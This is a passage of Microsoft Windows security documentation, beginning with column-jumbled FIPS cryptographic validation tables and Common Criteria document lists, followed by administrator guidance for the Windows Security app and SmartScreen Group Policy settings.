P-256 SHA: SHA-256 Cryptographic Implementations #1510
P-384 SHA: SHA-384
Version 10.0.15254
P-521 SHA: SHA-512
RSADP: Windows 10 Mobile (version 1709) SymCrypt

Modulus Size: 2048 (bits) Cryptographic Implementations #1509
Version 10.0.15254
RSASP1: Windows 10 Mobile (version 1709) SymCrypt

Version 10.0.15254
IKEv1: Windows 10 Mobile (version 1709) SymCrypt
Methods: Digital Signature, Pre-shared Key, Cryptographic Implementations #1507
Public Key Encryption
Version 10.0.15254
Pre-shared Key Length: 64-2048
Length: 2048 (bits)
Length: 256 (bits)
Length: 384 (bits)
IKEv2:
Length: 2048 (bits)
Length: 256 (bits)
Length: 384 (bits)
TLS:
Supports TLS 1.2:
ECDSA SigGen: Windows 10 Mobile (version 1709) MsBignum

P-384 SHA: SHA-384
Version 10.0.15254
P-521 SHA: SHA-512
RSADP: Windows 10 Mobile (version 1709) MsBignum

Version 10.0.15254
RSASP1: Windows 10 Mobile (version 1709) MsBignum

Version 10.0.15254
ECDSA SigGen: Windows 10 Home, Pro, Enterprise, Education, Windows
P-256 SHA: SHA-256 10 S Fall Creators Update and Windows Server, Windows
P-384 SHA: SHA-384 Server Datacenter (version 1709); MsBignum
Prerequisite: DRBG #1730 Version 10.0.16299
RSADP: Windows 10 Home, Pro, Enterprise, Education, Windows

Server Datacenter (version 1709); MsBignum
Version 10.0.16299

Padding Algorithms: PKCS 1.5 Server Datacenter (version 1709); MsBignum
Version 10.0.16299
ECDSA SigGen: Windows 10 Home, Pro, Enterprise, Education, Windows

P-256 SHA: SHA-256 10 S Fall Creators Update and Windows Server, Windows
P-384 SHA: SHA-384 Server Datacenter (version 1709); SymCrypt
Prerequisite: DRBG #1730 Version 10.0.16299
RSADP: Windows 10 Home, Pro, Enterprise, Education, Windows

Server Datacenter (version 1709); SymCrypt
Version 10.0.16299

Padding Algorithms: PKCS 1.5 Server Datacenter (version 1709); SymCrypt
Version 10.0.16299
IKEv1: Windows 10 Home, Pro, Enterprise, Education, Windows
Methods: Digital Signature, Pre-shared Key, 10 S Fall Creators Update and Windows Server, Windows
Public Key Encryption Server Datacenter (version 1709); SymCrypt
Pre-shared Key Length: 64-2048 Cryptographic Implementations #1496
Diffie-Hellman shared secrets: Version 10.0.16299
Length: 2048 (bits)
Length: 256 (bits)
Length: 384 (bits)
IKEv2:
Length: 2048 (bits)
Length: 256 (bits)
Length: 384 (bits)
TLS:
Supports TLS 1.2:
FIPS186-4 ECDSA Windows 10 Creators Update (version 1703) Home, Pro,
Signature Generation of hash sized messages MsBignum Cryptographic Implementations #1284
ECDSA SigGen Component: CURVES( P-256 P-384 P-521 Version 10.0. 15063
) Windows 10 Creators Update (version 1703) Home, Pro,
Version 10.0. 15063
Microsoft Windows 10 Anniversary Update, Windows
Version 10.0.14393
#894
Version 10.0.14393icrosoft Windows 10 November 2015
Update; Microsoft Surface Book, Surface Pro 4, Surface Pro
3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows
10 November 2015 Update; Windows 10 Mobile for
Microsoft Lumia 950 and Microsoft Lumia 635; Windows
10 for Microsoft Surface Hub 84” and Surface Hub 55”
Version 10.0.10586
Microsoft Windows 8.1, Microsoft Windows Server 2012
Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
Version 6.3.9600
FIPS186-4 RSA; PKCS#1 v2.1 Windows 10 Creators Update (version 1703) Pro,
Enterprise, Education Virtual TPM Implementations #1285
RSASP1 Signature Primitive Version 10.0.15063
RSASP1: (Mod2048: PKCS1.5 PKCSPSS) Windows 10 Creators Update (version 1703) Home, Pro,
Version 10.0.15063
Windows 10 Creators Update (version 1703) Home, Pro,
Version 10.0.15063
#893
Version 10.0.14393
Version 10.0.14393
Microsoft Windows 10 November 2015 Update; Microsoft
Surface Hub 84” and Surface Hub 55” MsBignum
Version 10.0.10586
Microsoft Windows 10, Microsoft Surface Pro 3 with
Surface Pro with Windows 10 MsBignum Cryptographic
Version 10.0.10240
Embedded 8.1 Industry MsBignum Cryptographic
Version 6.3.9600
FIPS186-4 RSA; RSADP Windows 10 Creators Update (version 1703) Home, Pro,
RSADP Primitive MsBignum Cryptographic Implementations #1283
RSADP: (Mod2048) Version 10.0.15063
Version 10.0.15063
#895
Version 10.0.14393
Version 10.0.14393
Version 10.0.10586
Surface Pro with Windows 10 Cryptography Next
Version 10.0.10240
SP800-135 Windows 10 Home, Pro, Enterprise, Education, Windows
Section 4.1.1, IKEv1 Section 4.1.2, IKEv2 Section 4.2, TLS Server Datacenter (version 1709); SymCrypt
Version 10.0.16299
Version 10.0.15063
Windows Embedded Compact Cryptographic Primitives
Version 7.00.2872
Windows Embedded Compact Cryptographic Primitives
Version 8.00.6246
Update BcryptPrimitives and NCryptSSLp #886
Version 10.0.14393
Surface Hub 84” and Surface Hub 55” BCryptPrimitives
and NCryptSSLp #664
Version 10.0.10586
Surface Pro with Windows 10 BCryptPrimitives and
NCryptSSLp #575
Version 10.0.10240
BCryptPrimitives and NCryptSSLp #323
Version 6.3.9600
References
[FIPS 140] - FIPS 140-2, Security Requirements for Cryptographic Modules
[FIPS FAQ ] - Cryptographic Module Validation Program (CMVP ) FAQ
[SP 800-57] - Recommendation for Key Management – Part 1: General (Revised)
[SP 800-131A] - Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key
Lengths
Additional Microsoft References
Enabling FIPS mode - http://support.microsoft.com/kb/811833
Cipher Suites in Schannel - http://msdn.microsoft.com/library/aa374757(VS.85).aspx
Common Criteria Certifications
Microsoft is committed to optimizing the security of its products and services. As part of that commitment,
Microsoft supports the Common Criteria certification program, continues to ensure that products incorporate the
features and functions required by relevant Common Criteria protection profiles, and completes Common Criteria
certifications of Microsoft Windows products.
Common Criteria Security Targets

Information for Systems Integrators and Accreditors
The Security Target describes security functionality and assurance measures used to evaluate Windows.
Microsoft Windows 10 (April 2018 Update)
Microsoft Windows 10 (Fall Creators Update)
Microsoft Windows 10 (Creators Update)
Microsoft Windows Server 2016, Microsoft Windows Server 2012 R2, and Microsoft Windows 10 Hyper-V
Microsoft Windows 10 (Anniversary Update) and Windows 10 Mobile (Anniversary Update)
Microsoft Windows 10 (Anniversary Update) and Windows Server 2016
Windows 10 (Anniversary Update) and Windows Server 2016 IPsec VPN Client
Microsoft Windows 10 IPsec VPN Client
Microsoft Windows 10 November 2015 Update with Surface Book
Microsoft Windows 10 Mobile with Lumia 950, 950 XL, 550, 635, and Windows 10 with Surface Pro 4
Windows 10 and Windows Server 2012 R2
Windows 10
Windows 8.1 with Surface 3 and Windows Phone 8.1 with Lumia 635 and Lumia 830
Microsoft Surface Pro 3 and Windows 8.1
Windows 8.1 and Windows Phone 8.1
Windows 8 and Windows Server 2012
Windows 8 and Windows RT
Windows 8 and Windows Server 2012 BitLocker
Windows 8, Windows RT, and Windows Server 2012 IPsec VPN Client
Microsoft Windows Server 2008 R2 Hyper-V Role
Windows Vista and Windows Server 2008 at EAL4+
Microsoft Windows Server 2008 Hyper-V Role
Windows Vista and Windows Server 2008 at EAL1
Windows Server 2003 SP2 including R2, x64, and IA64; Windows XP Professional SP2 and x64 SP2; and
Windows XP Embedded SP2
Windows Server 2003 Certificate Server
Windows Rights Management Services (RMS ) 1.0 SP2
Common Criteria Deployment and Administration

Information for IT Administrators
These documents describe how to configure Windows to replicate the configuration used during the Common
Criteria evaluation.
Windows 10, Windows 10 Mobile, Windows Server 2016, Windows Server 2012 R2
Windows 10 (Anniversary Update) and Windows Server 2016 IPsec VPN Client Operational Guidance
Microsoft Windows 10 November 2015 Update with Surface Book Administrative Guide
Microsoft Windows 10 Mobile and Windows 10 Administrative Guide
Windows 10 and Windows Server 2012 R2 Administrative Guide
Windows 10 Common Criteria Operational Guidance
Microsoft Surface Pro 3 Common Criteria Mobile Operational Guidance
Windows 8.1 and Windows Phone 8.1 CC Supplemental Admin Guide
Windows 8, Windows RT, and Windows Server 2012
Windows 7 and Windows Server 2008 R2 Supplemental CC Guide
Windows Server 2008 R2 Hyper-V Common Criteria Configuration Guide
Windows Vista and Windows Server 2008
Windows Vista and Windows Server 2008 Supplemental CC Guide
Windows Server 2008 Hyper-V Role Common Criteria Administrator Guide
Windows Server 2003 SP2 including R2, x64, and Itanium
Windows Server 2003 SP2 R2 Common Criteria Administrator Guide 3.0
Windows Server 2003 SP2 R2 Common Criteria Configuration Guide 3.0
Windows Server 2003 SP1(x86), x64, and IA64
Windows Server 2003 with x64 Hardware Administrator's Guide
Windows Server 2003 with x64 Hardware Configuration Guide
Windows Server 2003 SP1
Windows Server 2003 Administrator's Guide
Windows Server 2003 Configuration Guide
Windows XP Professional SP2 (x86) and x64 Edition
Windows XP Common Criteria Administrator Guide 3.0
Windows XP Common Criteria Configuration Guide 3.0
Windows XP Common Criteria User Guide 3.0
Windows XP Professional with x64 Hardware Administrator's Guide
Windows XP Professional with x64 Hardware Configuration Guide
Windows XP Professional with x64 Hardware User’s Guide
Windows XP Professional SP2, and XP Embedded SP2
Windows XP Professional Administrator's Guide
Windows XP Professional Configuration Guide
Windows XP Professional User's Guide
Windows Server 2003 Certificate Server
Windows Server 2003 Certificate Server Administrator's Guide
Windows Server 2003 Certificate Server Configuration Guide
Windows Server 2003 Certificate Server User's Guide
Common Criteria Evaluation Technical Reports and Certification /

Validation Reports
Information for Systems Integrators and Accreditors
An Evaluation Technical Report (ETR ) is a report submitted to the Common Criteria certification authority for how
Windows complies with the claims made in the Security Target. A Certification / Validation Report provides the
results of the evaluation by the validation team.
Windows 10 (Anniversary Update) and Windows Server 2016 IPsec VPN Client
Microsoft Windows 10 November 2015 Update with Surface Book
Microsoft Windows 10 Mobile with Lumia 950, 950 XL, 550, 635, and Windows 10 with Surface Pro 4
Windows 10
Windows 8.1 with Surface 3 and Windows Phone 8.1 with Lumia 635 and Lumia 830
Microsoft Surface Pro 3 and Windows 8.1
Windows 7 and Windows Server 2008 R2 Validation Report
Windows Vista and Windows Server 2008 Validation Report at EAL4+
Windows Server 2008 Hyper-V Role Certification Report
Windows Vista and Windows Server 2008 Certification Report at EAL1
Windows XP / Windows Server 2003 with x64 Hardware ETR
Windows XP / Windows Server 2003 with x64 Hardware ETR, Part II
Windows Server 2003 SP2 including R2, Standard, Enterprise, Datacenter, x64, and Itanium Editions Validation
Report
Windows XP Professional SP2 and x64 SP2 Validation Report
Windows XP Embedded SP2 Validation Report
Windows XP and Windows Server 2003 ETR
Windows XP and Windows Server 2003 Validation Report
Windows Server 2003 Certificate Server ETR
Windows Server 2003 Certificate Server Validation Report
Microsoft Windows Rights Management Services (RMS ) 1.0 SP2 Validation Report
Other Common Criteria Related Documents

Identifying Windows XP and Windows Server 2003 Common Criteria Certified Requirements for the NIST
Special Publication 800-53
Applies to
Windows 10, version 1703 and later
This library describes the Windows Security app, and provides information on configuring certain features,
including:
Showing and customizing contact information on the app and in notifications
Hiding notifications
In Windows 10, version 1709 and later, the app also shows information from third-party antivirus and firewall
apps.
In Windows 10, version 1803, the app has two new areas, Account protection and Device security.
NOTE
The Windows Security app is a client interface on Windows 10, version 1703 and later. It is not the Windows Defender
Security Center web portal console that is used to review and manage Windows Defender Advanced Threat Protection.
You can't uninstall the Windows Security app, but you can do one of the following:
Disable the interface on Windows Server 2016. See Windows Defender Antivirus on Windows Server 2016.
Hide all of the sections on client computers (see below ).
Disable Windows Defender Antivirus, if needed. See Enable and configure Windows Defender AV always-on
protection and monitoring.
You can find more information about each section, including options for configuring the sections - such as hiding
each of the sections - at the following topics:
Virus & threat protection, which has information and access to antivirus ransomware protection settings and
notifications, including the Controlled folder access feature of Windows Defender Exploit Guard and sign-in to
Microsoft OneDrive.
Account protection, which has information and access to sign-in and account protection settings.
Firewall & network protection, which has information and access to firewall settings, including Windows
Defender Firewall.
App & browser control, covering Windows Defender SmartScreen settings and Exploit protection mitigations.
Device security, which provides access to built-in device security settings.
Device performance & health, which has information about drivers, storage space, and general Windows
Update issues.
Family options, which includes access to parental controls along with tips and information for keeping kids safe
online.
NOTE
If you hide all sections then the app will show a restricted interface, as in the following screenshot:
Open the Windows Security app

Click the icon in the notification area on the taskbar.
Search the Start menu for Windows Security.

Open an area from Windows Settings.
NOTE
Settings configured with management tools, such as Group Policy, Microsoft Intune, or System Center Configuration
Manager, will generally take precedence over the settings in the Windows Security. See the topics for each of the sections for
links to configuring the associated features or products.
How the Windows Security app works with Windows security features
IMPORTANT
Windows Defender AV and the Windows Security app use similarly named services for specific purposes.
The Windows Security app uses the Windows Security Service (SecurityHealthService or Windows Security Health Servce),
which in turn utilizes the Security Center service (wscsvc) to ensure the app provides the most up-to-date information about
the protection status on the endpoint, including protection offered by third-party antivirus products, Windows Defender
Firewall, third-party firewalls, and other security protection.
These services do not affect the state of Windows Defender AV. Disabling or modifying these services will not disable
Windows Defender AV, and will lead to a lowered protection state on the endpoint, even if you are using a third-party
antivirus product.
Windows Defender AV will be disabled automatically when a third-party antivirus product is installed and kept up to date.
Disabling the Windows Security Center service will not disable Windows Defender AV or Windows Defender Firewall.
WARNING
If you disable the Security Center service, or configure its associated Group Policy settings to prevent it from starting or
running, the Windows Security app may display stale or inaccurate information about any antivirus or firewall products you
have installed on the device.
It may also prevent Windows Defender AV from enabling itself if you have an old or outdated third-party antivirus, or if you
uninstall any third-party antivirus products you may have previously installed.
This will significantly lower the protection of your device and could lead to malware infection.
The Windows Security app operates as a separate app or process from each of the individual features, and will
display notifications through the Action Center.
It acts as a collector or single place to see the status and perform some configuration for each of the features.
Disabling any of the individual features (through Group Policy or other management tools, such as System Center
Configuration Manager) will prevent that feature from reporting its status in the Windows Security app. The
Windows Security app itself will still run and show status for the other security features.
IMPORTANT
Individually disabling any of the services will not disable the other services or the Windows Security app.
For example, using a third-party antivirus will disable Windows Defender Antivirus. However, the Windows
Security app will still run, show its icon in the taskbar, and display information about the other features, such as
Windows Defender SmartScreen and Windows Defender Firewall.
Customize the Windows Security app for your
organization
Applies to
Audience
Enterprise security administrators
Manageability available with
Group Policy
You can add information about your organization in a contact card to the Windows Security app. This can include a
link to a support site, a phone number for a help desk, and an email address for email-based support.
This information will also be shown in some enterprise-specific notifications (including those for Windows
Defender Exploit Guard, the Block at first sight feature, and potentially unwanted applications.
Users can click on the displayed information to initiate a support request:
Clicking Call or the phone number will open Skype to start a call to the displayed number
Clicking Email or the email address will create a new email in the machine's default email app address to the
displayed email
Clicking Help portal or the website URL will open the machine's default web browser and go to the displayed
address
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of
Windows do not include these Group Policy settings.
Use Group Policy to enable and customize contact information

There are two stages to using the contact card and customized notifications. First, you have to enable the contact
card or custom notifications (or both), and then you must specify at least a name for your organization and one
piece of contact information.
This can only be done in Group Policy.
templates.
3. Expand the tree to Windows components > Windows Security > Enterprise Customization.
4. You enable the contact card and the customized notifications by configuring two separate Group Policy
settings. They will both use the same source of information (explained in Steps 7 and 8), and you can enable
both or only one or the other:
a. To enable the contact card, open the Configure customized contact information setting and set it
to Enabled. Click OK.
b. To enable the customized notifications, open the Configure customized notifications setting and
set it to Enabled. Click OK.
5. After you've enabled the contact card or the customized notifications (or both), you must configure the
Specify contact company name to Enabled. Enter your company or organization's name in the field in
the Options section. Click OK.
6. To ensure the custom notifications or contact card appear, you must also configure at least one of the
following settings by opening them, setting them to Enabled and adding the contact information in the
field under Options:
a. Specify contact email address or Email ID
b. Specify contact phone number or Skype ID
c. Specify contact website
7. Click OK after configuring each setting to save your changes.
IMPORTANT
You must specify the contact company name and at least one contact method - email, phone number, or website URL. If you
do not specify the contact name and a contact method the customization will not apply, the contact card will not show, and
notifications will not be customized.
Hide Windows Security app notifications
Applies to
Audience
Group Policy
The Windows Security app is used by a number of Windows security features to provide notifications about the
health and security of the machine. These include notifications about firewalls, antivirus products, Windows
Defender SmartScreen, and others.
In some cases, it may not be appropriate to show these notifications, for example, if you want to hide regular status
updates, or if you want to hide all notifications to the employees in your organization.
There are two levels to hiding notifications:
1. Hide non-critical notifications, such as regular updates about the number of scans Windows Defender Antivirus
ran in the past week
2. Hide all notifications
If you set Hide all notifications to Enabled, changing the Hide non-critical notifications setting will have no
effect.
You can only use Group Policy to change these settings.
Use Group Policy to hide non-critical notifications

You can hide notifications that describe regular events related to the health and security of the machine. These are
notifications that do not require an action from the machine's user. It can be useful to hide these notifications if you
find they are too numerours or you have other status reporting on a larger scale (such as Update Compliance or
System Center Configuration Manager reporting).
IMPORTANT
Requirements
You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not
include these Group Policy settings.
templates.
3. Expand the tree to Windows components > Windows Security > Notifications.
4. Open the Hide non-critical notifications setting and set it to Enabled. Click OK.
Use Group Policy to hide all notifications

You can hide all notifications that are sourced from the Windows Security app. This may be useful if you don't want
users of the machines from inadvertently modifying settings, running antivirus scans, or otherwise performing
security-related actions without your input.
IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Notifications.
4. Open the Hide all notifications setting and set it to Enabled. Click OK.
Manage Windows Security in Windows 10 in S mode
Applies to
Windows 10 in S mode, version 1803
Audience
Microsoft Intune
Windows 10 in S mode is streamlined for tighter security and superior performance. With Windows 10 in S mode,
users can only use apps from the Microsoft Store, ensuring Microsoft-verified security so you can minimize
malware attacks. In addition, using Microsoft Edge provides a more secure browser experience, with extra
protections against phishing and malicious software.
The Windows Security interface is a little different in Windows 10 in S mode. The Virus & threat protection area
has fewer options, because the built-in security of Windows 10 in S mode prevents viruses and other threats from
running on devices in your organization. In addition, devices running Windows 10 in S mode receive security
updates automatically.
For more information about Windows 10 in S mode, including how to switch out of S mode, see Windows 10
Pro/Enterprise in S mode.
Managing Windows Security settings with Intune

In the enterprise, you can only manage security settings for devices running Windows 10 in S mode with Microsoft
Intune or other mobile device management apps. Windows 10 in S mode prevents making changes via PowerShell
scripts.
For information about using Intune to manage Windows Security settings on your organization's devices, see Set
up Intune and Endpoint protection settings for Windows 10 (and later) in Intune.
Virus and threat protection
Applies to
The Virus & threat protection section contains information and settings for antivirus protection from Windows
Defender Antivirus and third-party AV products.
In Windows 10, version 1803, this section also contains information and settings for ransomware protection and
recovery. This includes Controlled folder access settings to prevent unknown apps from changing files in protected
folders, plus Microsoft OneDrive configuration to help you recover from a ransomware attack. This area also
notifies users and provides recovery instructions in the event of a ransomware attack.
IT administrators and IT pros can get more information and documentation about configuration from the
following:
Windows Defender Antivirus in the Windows Security app
Windows Defender Antivirus documentation library
Protect important folders with Controlled folder access
Defend yourself from cybercrime with new Office 365 capabilities
Office 365 advanced protection
Ransomware detection and recovering your files
You can choose to hide the Virus & threat protection section or the Ransomware protection area from users
of the machine. This can be useful if you don't want employees in your organization to see or have access to user-
configured options for the features shown in the section.
Hide the Virus & threat protection section

You can choose to hide the entire section by using Group Policy. The section will not appear on the home page of
the Windows Security app, and its icon will not be shown on the navigiation bar on the side of the app.
IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Virus and threat protection.
4. Open the Hide the Virus and threat protection area setting and set it to Enabled. Click OK.
NOTE
Hide the Ransomware protection area

You can choose to hide the Ransomware protection area by using Group Policy. The area will not appear on the
Virus & threat protection section of the Windows Security app.
IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Virus and threat protection.
4. Open the Hide the Ransomware data recovery area setting and set it to Enabled. Click OK.
Account protection
Applies to
The Account protection section contains information and settings for account protection and sign in. IT
administrators and IT pros can get more information and documentation about configuration from the following:
Microsoft Account
Windows Hello for Business
Lock your Windows 10 PC automatically when you step away from it
You can also choose to hide the section from users of the machine. This can be useful if you don't want employees
in your organization to see or have access to user-configured options for the features shown in the section.
Hide the Account protection section

IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Account protection.
4. Open the Hide the Account protection area setting and set it to Enabled. Click OK.
NOTE
Firewall and network protection
Applies to
The Firewall & network protection section contains information about the firewalls and network connections
used by the machine, including the status of Windows Defender Firewall and any other third-party firewalls. IT
administrators and IT pros can get configuration guidance from the Windows Defender Firewall with Advanced
Security documentation library.
In Windows 10, version 1709 and later, the section can be hidden from users of the machine. This can be useful if
you don't want employees in your organization to see or have access to user-configured options for the features
shown in the section.
Hide the Firewall & network protection section

IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Firewall and network protection.
4. Open the Hide the Firewall and network protection area setting and set it to Enabled. Click OK.
NOTE
App and browser control
Applies to
The App and browser control section contains information and settings for Windows Defender SmartScreen. IT
administrators and IT pros can get configuration guidance from the Windows Defender SmartScreen
documentation library.
In Windows 10, version 1709 and later, the section also provides configuration options for Exploit protection. You
can prevent users from modifying these specific options with Group Policy. IT administrators can get more
information at the Exploit protection topic in the Windows Defender Exploit Guard library.
You can also choose to hide the section from users of the machine. This can be useful if you don't want employees
in your organization to see or have access to user-configured options for the features shown in the section.
Prevent users from making changes to the Exploit protection area in

the App & browser control section
You can prevent users from modifying settings in the Exploit protection area. The settings will be either greyed out
or not appear if you enable this setting. Users will still have access to other settings in the App & browser control
section, such as those for Windows Defender SmartScreen, unless those options have been configured separately.
You can only prevent users from modifying Exploit protection settings by using Group Policy.
IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > App and browser protection.
4. Open the Prevent users from modifying settings setting and set it to Enabled. Click OK.
Hide the App & browser control section

IMPORTANT
Requirements
You must have Windows 10, version 1709 (the Fall Creators Update). The ADMX/ADML template files for earlier versions of
Windows do not include these Group Policy settings.
templates.
3. Expand the tree to Windows components > Windows Security > App and browser protection.
4. Open the Hide the App and browser protection area setting and set it to Enabled. Click OK.
NOTE
Device security
Applies to
The Device security section contains information and settings for built-in device security.
You can choose to hide the section from users of the machine. This can be useful if you don't want employees in
your organization to see or have access to user-configured options for the features shown in the section.
Hide the Device security section

IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Device security.
4. Open the Hide the Device security area setting and set it to Enabled. Click OK.
NOTE
Disable the Clear TPM button
If you don't want users to be able to click the Clear TPM button in the Windows Security app, you can disable it.
IMPORTANT
Requirements
templates.
4. Open the Disable the Clear TPM button setting and set it to Enabled. Click OK.
Hide the TPM Firmware Update recommendation

If you don't want users to see the recommendation to update TPM firmware, you can disable it.
templates.
4. Open the Hide the TPM Firmware Update recommendation setting and set it to Enabled. Click OK.
Disable Memory integrity switch

If you don't want users to be able to change the Hypervisor Control Integrity (HVCI), or memory integrity, setting
on their computers, you can disable the Memory integrity switch.
templates.
4. Open the Disable Memory integrity switch setting and set it to Enabled. Click OK.
Device performance and health
Applies to
The Device performance & health section contains information about hardware, devices, and drivers related to
the machine. IT administrators and IT pros should reference the appropriate documentation library for the issues
they are seeing, such as the configure the Load and unload device drivers security policy setting and how to deploy
drivers during Windows 10 deployment using System Center Configuration Manager.
The Windows 10 IT pro troubleshooting topic, and the main Windows 10 documentation library can also be
helpful for resolving issues.
In Windows 10, version 1709 and later, the section can be hidden from users of the machine. This can be useful if
you don't want employees in your organization to see or have access to user-configured options for the features
shown in the section.
Hide the Device performance & health section

IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Device performance and health.
4. Open the Hide the Device performance and health area setting and set it to Enabled. Click OK.
NOTE
Family options
Applies to
The Family options section contains links to settings and further information for parents of a Windows 10 PC. It
is not generally intended for enterprise or business environments.
Home users can learn more at the Help protection your family online in Windows Security topic at
support.microsoft.com
In Windows 10, version 1709, the section can be hidden from users of the machine. This can be useful if you don't
want employees in your organization to see or have access to this section.
Hide the Family options section

IMPORTANT
Requirements
templates.
3. Expand the tree to Windows components > Windows Security > Family options.
4. Open the Hide the Family options area setting and set it to Enabled. Click OK.
NOTE
Windows Defender SmartScreen
Applies to:
Windows 10
Windows 10 Mobile
Windows Defender SmartScreen helps to protect your employees if they try to visit sites previously reported as
phishing or malware websites, or if an employee tries to download potentially malicious files.
SmartScreen determines whether a site is potentially malicious by:
Analyzing visited webpages looking for indications of suspicious behavior. If it finds suspicious pages,
SmartScreen shows a warning page, advising caution.
Checking the visited sites against a dynamic list of reported phishing sites and malicious software sites. If it
finds a match, SmartScreen shows a warning to let the user know that the site might be malicious.
SmartScreen determines whether a downloaded app or app installer is potentially malicious by:
Checking downloaded files against a list of reported malicious software sites and programs known to be
unsafe. If it finds a match, SmartScreen shows a warning to let the user know that the site might be
malicious.
Checking downloaded files against a list of files that are well known and downloaded by many Windows
users. If the file isn't on that list, SmartScreen shows a warning, advising caution.
NOTE
Before Windows 10, version 1703 this feature was called the SmartScreen Filter when used within the browser and
Windows SmartScreen when used outside of the browser.
Benefits of Windows Defender SmartScreen

Windows Defender SmartScreen helps to provide an early warning system against websites that might engage in
phishing attacks or attempt to distribute malware through a socially-engineered attack. The primary benefits are:
Anti-phishing and anti-malware support. SmartScreen helps to protect your employees from sites that
are reported to host phishing attacks or attempt to distribute malicious software. It can also help protect
against deceptive advertisements, scam sites, and drive-by attacks. Drive-by attacks are web-based attacks
that tend to start on a trusted site, targeting security vulnerabilities in commonly-used software. Because
drive-by attacks can happen even if the user does not click or download anything on the page, the danger
often goes unnoticed. For more info about drive-by attacks, see Evolving Microsoft SmartScreen to protect
you from drive-by attacks
Reputation-based URL and app protection. SmartScreen evaluates a website's URLs to determine if
they're known to distribute or host unsafe content. It also provides reputation checks for apps, checking
downloaded programs and the digital signature used to sign a file. If a URL, a file, an app, or a certificate
has an established reputation, your employees won't see any warnings. If however there's no reputation, the
item is marked as a higher risk and presents a warning to the employee.
Operating system integration. SmartScreen is integrated into the Windows 10 operating system,
meaning that it checks any files an app (including 3rd-party browsers and email clients) attempts to
download and run.
Improved heuristics and diagnostic data. SmartScreen is constantly learning and endeavoring to stay
up-to-date, so it can help to protect you against potentially malicious sites and files.
Management through Group Policy and Microsoft Intune. SmartScreen supports using both Group
Policy and Microsoft Intune settings. For more info about all available settings, see Available Windows
Defender SmartScreen Group Policy and mobile device management (MDM ) settings.
Viewing Windows Defender SmartScreen anti-phishing events

When Windows Defender SmartScreen warns or blocks an employee from a website, it's logged as Event 1035 -
Anti-Phishing.
Viewing Windows event logs for SmartScreen

SmartScreen events appear in the Microsoft-Windows-SmartScreen/Debug log in Event Viewer.
EVENTID DESCRIPTION
1000 Application SmartScreen Event
1001 Uri SmartScreen Event
1002 User Decision SmartScreen Event
Related topics
SmartScreen Frequently Asked Questions (FAQ )
Threat protection
Available Windows Defender SmartScreen Group Policy and mobile device management (MDM ) settings
NOTE
Help to make this topic better by providing us with edits, additions, and feedback. For info about how to contribute to this
topic, see Contributing to TechNet content.
Available Windows Defender SmartScreen Group
Policy and mobile device management (MDM)
settings
Applies to:
Windows 10
Windows 10 Mobile
Windows Defender SmartScreen works with Intune, Group Policy, and mobile device management (MDM )
settings to help you manage your organization's computer settings. Based on how you set up Windows Defender
SmartScreen, you can show employees a warning page and let them continue to the site, or you can block the site
entirely.
See Windows 10 (and later) settings to protect devices using Intune for the controls you can use in Intune.
Group Policy settings

SmartScreen uses registry-based Administrative Template policy settings. For more info about Group Policy, see
the Group Policy TechCenter. This site provides links to the latest technical documentation, videos, and downloads
for Group Policy.
SETTING SUPPORTED ON DESCRIPTION
Windows 10, version 1703: At least Windows Server 2012, This policy setting turns on Windows
Administrative Templates\Windows Windows 8 or Windows RT Defender SmartScreen.
Components\Windows Defender If you enable this setting, it turns
SmartScreen\Explorer\Configure on Windows Defender SmartScreen
Windows Defender SmartScreen and your employees are unable to
Windows 10, Version 1607 and turn it off. Additionally, when
earlier: enabling this feature, you must also
Administrative Templates\Windows pick whether SmartScreen should
Components\File Warn your employees or Warn and
Explorer\Configure Windows prevent bypassing the message
SmartScreen (effectively blocking the employee
from the site).
If you disable this setting, it turns
off Windows Defender SmartScreen
and your employees are unable to
turn it on.
If you don't configure this setting,
your employees can decide whether
to use Windows Defender
SmartScreen.
Administrative Templates\Windows Windows 10, version 1703 This setting helps protect PCs by
Components\Windows Defender allowing users to install apps only from
SmartScreen\Explorer\Configure App the Microsoft Store. SmartScreen must
Install Control be enabled for this feature to work
properly.
If you enable this setting, your
employees can only install apps
from the Microsoft Store.
If you disable this setting, your
employees can install apps from
anywhere, including as a download
from the Internet.
your employees can choose
whether they can install from
anywhere or only from Microsoft
Store.
Windows 10, version 1703: Microsoft Edge on Windows 10 or later This policy setting turns on Windows
Administrative Templates\Windows Defender SmartScreen.
Components\Windows Defender If you enable this setting, it turns
SmartScreen\Microsoft Edge\Configure on Windows Defender SmartScreen
Windows Defender SmartScreen and your employees are unable to
Windows 10, Version 1607 and turn it off.
earlier:
Administrative Templates\Windows If you disable this setting, it turns
Components\Microsoft off Windows Defender SmartScreen
Edge\Configure Windows and your employees are unable to
SmartScreen turn it on.
your employees can decide whether
to use Windows Defender
SmartScreen.
Windows 10, version 1703: Microsoft Edge on Windows 10, version This policy setting stops employees
Administrative Templates\Windows 1511 or later from bypassing the Windows Defender
Components\Windows Defender SmartScreen warnings about potentially
SmartScreen\Microsoft Edge\Prevent malicious files.
bypassing Windows Defender If you enable this setting, it stops
SmartScreen prompts for files employees from bypassing the
Windows 10, Version 1511 and warning, stopping the file
1607: download.
Administrative Templates\Windows
Components\Microsoft If you disable or don't configure this
Edge\Prevent bypassing Windows setting, your employees can bypass
SmartScreen prompts for files the warnings and continue to
download potentially malicious files.
Windows 10, version 1703: Microsoft Edge on Windows 10, version This policy setting stops employees
Administrative Templates\Windows 1511 or later from bypassing the Windows Defender
Components\Windows Defender SmartScreen warnings about potentially
SmartScreen\Microsoft Edge\Prevent malicious sites.
bypassing Windows Defender If you enable this setting, it stops
SmartScreen prompts for sites employees from bypassing the
Windows 10, Version 1511 and warning, stopping them from going
1607: to the site.
Administrative Templates\Windows
Components\Microsoft If you disable or don't configure this
Edge\Prevent bypassing Windows setting, your employees can bypass
